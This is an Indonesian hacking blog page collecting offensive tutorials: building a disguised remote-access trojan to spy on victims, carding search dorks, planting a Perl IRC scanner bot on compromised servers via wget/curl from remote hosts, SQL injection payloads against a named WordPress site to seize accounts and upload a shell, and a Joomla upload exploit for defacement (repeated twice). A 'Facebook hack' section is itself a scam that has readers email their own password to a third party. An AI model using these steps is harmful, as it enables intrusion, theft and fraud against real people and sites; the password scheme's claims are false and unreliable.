Selamat Di Blogger Calipow.Semoga Isi Dari Blogger Bermanfaat Buat Kalian Semua___thanks : Kandangan Peneration Scurity ] calipow_wolez ] djasID ] tantrum djas ] Undetected Page ] Oz Pinguin ] Kaizna Neztara
Tampilkan postingan dengan label hack. Tampilkan semua postingan
Tampilkan postingan dengan label hack. Tampilkan semua postingan

Cara Hacking Komputer Orang Lain (Jarak Jauh)

Turkojan 4.0 Gold  sebuah software hack yang berkapasitas 2.8 MB dan mempunyai fungsi memonitoring aktivitas orang lain dari jarak jauh, dapat mengambil file dari komputer orang seperti foto dan lain-lain. Nah, kita akan belajar untuk mengunakannya. Jadi kita bisa memonitoring orang lain dengan software ini. Tapi anda dan korban anda harus konek internet.


Ini caranya :



1Download dulu Turkojan 4.0 Gold.


* Matikan terlebih dahulu antivirus anda sebelum membuka software ini karena software ini terdeteksi beberapa antivirus.

2. Buka file yang bernama Client.exe maka terlihat seperti berikut.


3. Selanjutnya kita akan membuat trojan untuk korban.
4. Klik Editor.

 

5. Masukan alamat IP korban pada kolom Address. Connection port biarkan tetap seperti itu.
6. Masukan Username. Masukan Username yang unik agar si korban mahu membukanya. ContohUsername  Facebook Hack 1.7 atau yang lain terserah anda.
7. Berikan tanda check / benar. Ikuti seperti gambar di atas.
8. Jika anda mengklik Test, hasilnya seperti gambar berikut.


* Ganti nama Bilgi dan Server basariyla kuruldu! terserah anda.

9. Klik Select Icon utuk mengganti gambar icon.
10. Yang terakhir klik Save. Dan anda telah berhasil menyelesaikan tahap pembuatan file trojan.Lihat hasil yang saya buat seperti berkut. 
11. Tahap selanjutnya yaitu upload file trojan yang telah anda buat ke megaupload, ziddu atau yang lain-lain. Lalu Suruh target anda mendownloadnya.
12. Klik Start lalu menunggu target anda mendownload dan membuka trojan tersebut. Jika anda berhasil maka akan terlihat ada yang online di software Trojan 4.0 Gold.
13. Silahkan buka file-filenya.
Terima kasih itu adalah cara caranya

Dork carding update 2014


  • inurl:".php?cat="+intext:"Paypal"+site:UK
  • inurl:".php?cat="+intext:"/Buy Now/"+site:.net
  • inurl:".php?cid="+intext:"online+betting"
  • inurl:".php?id=" intext:"View cart"
  • inurl:".php?id=" intext:"Buy Now"
  • inurl:".php?id=" intext:"add to cart"
  • inurl:".php?id=" intext:"shopping"
  • inurl:".php?id=" intext:"boutique"
  • inurl:".php?id=" intext:"/store/"
  • inurl:".php?id=" intext:"/shop/"
  • inurl:".php?id=" intext:"toys"
  • inurl:".php?cid="
  • inurl:".php?cid=" intext:"shopping"
  • inurl:".php?cid=" intext:"add to cart"
  • inurl:".php?cid=" intext:"Buy Now"
  • inurl:".php?cid=" intext:"View cart"
  • inurl:".php?cid=" intext:"boutique"
  • inurl:".php?cid=" intext:"/store/"
  • inurl:".php?cid=" intext:"/shop/"
  • inurl:".php?cid=" intext:"Toys"
  • inurl:".php?cat="
  • inurl:".php?cat=" intext:"shopping"
  • inurl:".php?cat=" intext:"add to cart"
  • inurl:".php?cat=" intext:"Buy Now"
  • inurl:".php?cat=" intext:"View cart"
  • inurl:".php?cat=" intext:"boutique"
  • inurl:".php?cat=" intext:"/store/"
  • inurl:".php?cat=" intext:"/shop/"
  • inurl:".php?cat=" intext:"Toys"
  • inurl:".php?catid="
  • inurl:".php?catid=" intext:"View cart"
  • inurl:".php?catid=" intext:"Buy Now"
  • inurl:".php?catid=" intext:"add to cart"
  • inurl:".php?catid=" intext:"shopping"
  • inurl:".php?catid=" intext:"boutique"
  • inurl:".php?catid=" intext:"/store/"
  • inurl:".php?catid=" intext:"/shop/"
  • inurl:".php?catid=" intext:"Toys"

Script BOT Scan dan File pendukungnya dapat diambil disini...


Nah... Sekarang kita mulai editing BOT Scan-nya agar join ke channel kita
Perhatikan bagian ini... Silahkan edit sesuai keperluan...
Tapi jangan sampe salah masukkan konfigurasinya... Bisa ngga jalan BOT-nya...

###############CONFIGURATION#########
my $processo = "/usr/local/apache/bin/httpd -DSSL"; >>> Ini Fake Process yang berjalan di background
my $printcmd="http://destra.ca/s"; >>> Ini script yang dipakai buat injection
my $server="swiftco.wa.us.dal.net"; >>> Ini server IRC tempat mangkal-nya BOT
my $porta="6667"; >>> Ini port yang digunakan oleh server IRC
my $nick="Cleaning_Service"; >>> Ini nick yang digunakan untuk BOT
my $chan="#hackers-center"; >>> Ini channel tempat mangkalnya BOT
###############END OF CONFIGURATION####

Oke... Konfigurasi selesai...

Selanjutnya liat bagian ini...

my $cmd="http://www.alkautsar-bdl.sch.id/safe.txt";

File safe.txt merupakan source pendukung untuk BOT Mic22... Jangan sampe link tersebut tidak bisa diakses...
Solusinya... Upload link tersebut bersama-sama dengan source BOT yang akan kita jalankan... Dan ganti link tersebut sesuai dengan url yang menuju file safe.txt...
Jangan menggunakan file safe.txt dari source lainnya... Karena bisa saja berbeda versinya...

Nah... Sekarang untuk menjalankan BOT Scan pada injekan...
Karena kita belum memiliki BOT Scan sendiri... Injekan bisa liat di channel yang sudah ada BOT Scan atau minta kepada yang sering melakukan scanning...
>>> Jangan minta sama saya yaaaa... 

1. Upload script di hosting sendiri atau di hosting gratisan... Yang penting bisa diakses... Selalu bawa script tersebut di FD...
2. Masuk ke server yang vulnerable... Cari direktory yang writable (Bisa ditulis) atau file permision-nya 777... Liat di command untuk r57... Atau pake perintah “find / -perm 777 -type d
3. Download file script BOT Scan... Perintahnya...???
wget http:://www.link-file-hostingan-loe.com;ls -al atau
lwp-download http:://www.link-file-hostingan-loe.com;ls -al atau
curl -o http:://www.link-file-hostingan-loe.com scan.txt
4. Kalo ngga bisa juga... Upload aza langsung dari r57 atau c99...
5. Gunakan perintah "mv [file awal] [file baru]" untuk mengubah nama file
6. Eksekusi file scanner menggunakan perintah "perl [nama file]
7. Tunggu BOT-nya di channel... Good Luck
8. Untuk melihat proses di background menggunakan perintah "ps x"
9. Untuk mematikan proses di background menggunakan perintah "kill -9 [PID Number]

Tambahan:
Tutorial ini hanya berjalan pada mesin LINUX atau keluarga OS UNIX
Semua command diatas digunakan tanpa tanda "
Kalau BOT-nya ngga join di channel... Ada beberapa hal yang bisa jadi problem...
1. Server tidak mendukung Perl
2. Server tidak kuat menjalankan program BOT Scan
3. BOT Scan di blok oleh firewall
4. IP server di AKILL oleh server IRC dimana kita joinkan BOT
5. Konfigurasi script ada yang salah

Untuk source BOT Scan diatas... Daftar perintah yang digunaka adalah...
!help >>> Untuk melihat daftar perintah
!clean [bug] [dork] >>> Untuk melakukan scanning
!mwultimi >>> Untuk melihat list bug terbaru diwww.milw0rm.com 
!engine >>> Untuk melihat search engine yang support pada BOT
!info >>> Untuk melihat info BOT
!kill >>> Untuk mematikan BOT... Ini perintah rahasia... Sebaiknya diganti sesuai dengan selera ADMIN BOT

Cara Hack Webiste Wordpress Tanpa Cracking Hash MD5

Hy kawan Google Media News semua, disini saya akan menunjukkan kepada kawan semua bagaimana cara hack situs wordpress tanpa harus men-crak hash MD5.. senang Ok langsung saja kawan.

sekarang ini masih bekerja dengan semua exploits sqli wordpress yang ada di salah satu tema atau plugin ..

Perlu untuk diingat:
Anda tidak dapat memanfaatkan di versi terbaru dari wordpress selain versi 3.4.2 yang dirilis pada 6 September 2012.

sekarang masih banyak situs di luar sana yang belum diperbarui. semua versi sebelumnya dapat dieksploitasi dengan menggunakan metode ini ..

Jadi.. mari kita mulai ..

Hal yang perlu anda tahu.

1) setiap wordpress perlu dork sqli.. (kamu bisa mendapatkannya di exploit-db.com)
2) pengetahuan sqli .. (saya tidak membahas nya di thread ini coz ini bukan tentang sqli)

1) Dork Saya gunakan disini
Ada beberapa eksploitasi sqli di plugin yang berbeda dan tema wordpress. Saya gunakan Exploit salah satu plugin yang disebut Wp-FacebookConnect.. dan dork google yang saya gunakan adalah ..


Code:
inurl:"/?fbconnect_action=myhome"

sekarang paste kode ini di google.com (salah satu teman terbaik saya)
dan kamu akan melihat banyak situs yang rentan terhadapat Sql, tetapi dulu, kemungkinan sekarang sudah banyak di upgrade ke versi baru, terngantung si punya WP menjulurkan lidah ...

2) sekarang yang saya gunakan untuk target di sini adalah
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2



di sini parameter userid rentan terhadap sqli ..
jadi mari kita lihat apa yang bisa kita dapatkan dari database ..
Saya akan mengubah URL di atas menjadi seperti ini
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email) ​​,7,8,9,10,11,12+from+wp_users--

sekarang kamu dapat melihat saya mendapat username dengan id email ..


sekarang saya mengubah URL di atas menjadi seperti ini ..
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), ​​7,8,9,10,11,12+from+wp_users--

Maka saya akan mendapatkan user name dan password yang masih hashed MD5..


(Perlu dicatat di sini .. saya menggunakan concat sini .. kamu juga dapat menggunakan group_concat untuk mendapatkan semua User (Perlu pengetahuan anda untuk belajar cara menggunakan sqli))

sekarang .. kita semua tahu bahwa kategori hash wordpress MD5 (wordpress) berbeda dari MD5 yang lain nya dan sangat sederhana, kalau yang WP sangat sulit untuk retak ..

tetapi jika kamu kreatif.. kamu harus berpikir keluar dari kotak tsb untuk mendapat cara supaya bisa memecahkan nya..

jadi sekarang ikuti langkah-langkah di bawah untuk memecahkan nya..

a) pergi ke halaman login dari situs wordpress .. dalam kasus saya ini seperti di bawah..
Code:
http://masaru.ikeda.me/wp-login.php

b) klik pada Lost your password?


c) sekarang wordpress akan meminta saya untuk username Or email .. untuk me-reset password .. dalam kasus saya ini adalah username nya 'masaru' bisa anda lihat di atas tadi, username nya "masaru" Bukan?.. jadi lanjutkan dan masukkan username ..
[Image: 5.PNG]

d) sekarang lihat apa yang di bilang di halam tsb.. "Check your e-mail for the confirmation link ("Periksa e-mail untuk link konfirmasi.")"


e) sekarang wordpress akan mengirimkan kunci aktivasi ke alamat email dari pengguna tadi "masaru" tentu nya ke email dia.. dan menetapkan nilai dari kunci aktivasi dalam basis data.. apa yang harus kita lakukan untuk mendapatkan aktivasi kunci tadi?

f) jadi sekarang saya akan mengubah URL saya ini .. untuk mendapatkan kunci aktivasi ..
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa ​​tion_key),7,8,9,10,11,12+from+wp_users--

dan kita dapat melihat .. kita punya kunci aktivasi di sini .. kita harus mencatat itu untuk menggunakan di suatu tempat nanti..


g) Sekarang .. yang harus kita lakukan adalah .. tanpa pergi ke alamat email untuk me-reset password .. kita hanya menambahkan URL ini saja maka nanti akan aktif dengan sendiri nya dan kita langsung di beri akses untuk mengubah password baru..
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

dan saya akan menggantikan KEYHERE dengan kunci aktivasi kita simpan tadi.. dan juga dengan USERNAME dengan username yang dalam kasus saya adalah 'Masaru' .. jadi URL di atas tadi akan menjadi seperti di bawah ini ..
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

dan lihat nanti.. wordpress akan meminta kamu untuk membuat password baru Cool ubah lah seperti yang anda ingin kan di page tsb
[Image: 8.PNG]

dan sekarang pergi ke halaman login lagi .. dan mencoba password baru dan anda mem-punya akses ke panel Wordpress..
[Image: 9.PNG]

Dan setelah itu apa yang harus saya lakukan?
1. Pertama anda harus mempunyai satu Shell, kalau belum punya, silahkan download disini.

2. Upload Shell tersebut dan bersenang"lah di dalam, tersenyum lebar Kalau belum tahu cara meng-upload shell nya bisa anda lihat Disini sudah saya post treads nya dgn Video menjulurkan lidah

Semoga bermanfaat buat kawan semua trol

Note: Saya tidak menganjurkan buat anda untuk mempraktekkan hal seperti di atas, jika ada kerusakan web orang lain maka tanggung jawab pribadi anda masing-masing menjulurkan lidah jangan bawa" nama saya ok 

Cara deface dengan metode Com_Fabrik


Cara deface dengan metode Com_Fabrik - Halo sahabat Scupe.Id, kali ini saya akan memberi tahu anda bagaimana cara mendeface web joomla dengan metode Exploit Joomla ( Com_Fabrik ). Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba.

Bahan: Shell ( Download Here )

Baca Juga: Download Shell 1n73ction V 3.2 [Special Edition]


Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com 
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.



2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


3. Masukkan shell milik sobat (Pilih File)  dan lalu klik tombol import CSV


4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbedadengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)

*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.


5. Klik pada tulisan htdocs/public_html/lainnya sesuai dengan webnya  (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama


6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya 


7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.


8. Jika save succes maka akan muncul script anda di halaman utama web target.

Cara deface dengan metode Com_Fabrik - Halo sahabat Scupe.Id, kali ini saya akan memberi tahu anda bagaimana cara mendeface web joomla dengan metode Exploit Joomla ( Com_Fabrik ). Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba.

Bahan: Shell ( Download Here )

Baca Juga: Download Shell 1n73ction V 3.2 [Special Edition]


Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com 
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.



2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


3. Masukkan shell milik sobat (Pilih File)  dan lalu klik tombol import CSV


4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbedadengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)

*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.


5. Klik pada tulisan htdocs/public_html/lainnya sesuai dengan webnya  (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama


6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya 


7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.


8. Jika save succes maka akan muncul script anda di halaman utama web target.

Cara Hack Facebook Orang Dengan Mudah 100%

1. login ke yahoo.


ingat..!! account yahoo anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat
yg anda gunakan pada saat registrasi facebook. Yahoo akan dengan otomatis menolak email yg tidak terhubung ke Facebook.

2. Jika sudah masuk ke yahoo, tulislah sebuah email yang anda tujukan untuk staff facebook di Yahoo dengan alamat email:
fbreserved.facebook@yahoo.com


server Yahoo akan mengirimkan secara otomatis password “terlupakan” tersebut.

3. Pada baris SUBJECT masukkan/ketik kalimat : PASSWORD RETRIEVE

4. lalu pada baris pertama mail anda tuliskan alamat email korban yg akan anda hack

5. Pada baris kedua masukkan alamat email yg anda gunakan

6. Pada baris ketiga tuliskan password yahoo anda.

Ingat, password yang anda masukkan inilah yang akan menentukan berhasil tidaknya usaha anda karena sever yahoo akan secara otomatis melakukan login untuk meng-konfirmasi valid atau tidaknya email andan, dengan kata lain server yahoo akan meng-extract password dari email calon korban anda dengan menggunakan password anda.

Dan proses ini sangat aman karena anda mengirim email kepada mesin dan bukan kepada seseorang.

7. Dan di baris terakhir masukkan kata : cgi-bin/$et76431&pwrsa ini merupakan kode yang dibutuhkan untuk men-cocokkan email anda dengan email calon korban yg anda minta password nnya.

jadi jika misalkan email anda adalah bambangpamungkas@yahoo.com

dan email korban anda adalah shireensungkar@yahoo.com

dan password anda adalah : rahasia

maka email yg anda tulis nantinya adalah:

To: fbreserved.facebook@yahoo.com
bcc: cc: (biarkan kosong)
Subject: password retrieve

shireensungkar@yahoo.com

bambangpamungkas@yahoo.com

rahasia

cgi-bin/$et76431&pwrsa

selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo dengan dengan subject: System Reg
Message

biasanya yahoo memerlukan waktu sekitar 30 menit untuk mengkonfirmasikan dan meng-extract password yang anda minta.

selamat mencobanya

Koleksi 1000+ Tutorial Hacking (E-Book)


NOTE:Pembaca yang baik selalu meninggalkan komentar
Hay sobat Blogger pembaca setia http://cybercrew-newbie ! kali ini saya akan membahas tentang Tutorial Hacking (2008) Berupa E-Book (Elektronik Book).
Langsung aja ke TKP :
1. Download E-Book nya dibawah ini :


2. Kalau ada Adf.ly di SKIP AD aja.
3. Happy Reading !
Saya juga Nubie seperti anda, sehingga membutuhkan E-book yang banyak di Google, tapi mungkin saya bisa membantu dengan E-Book ini, Salam !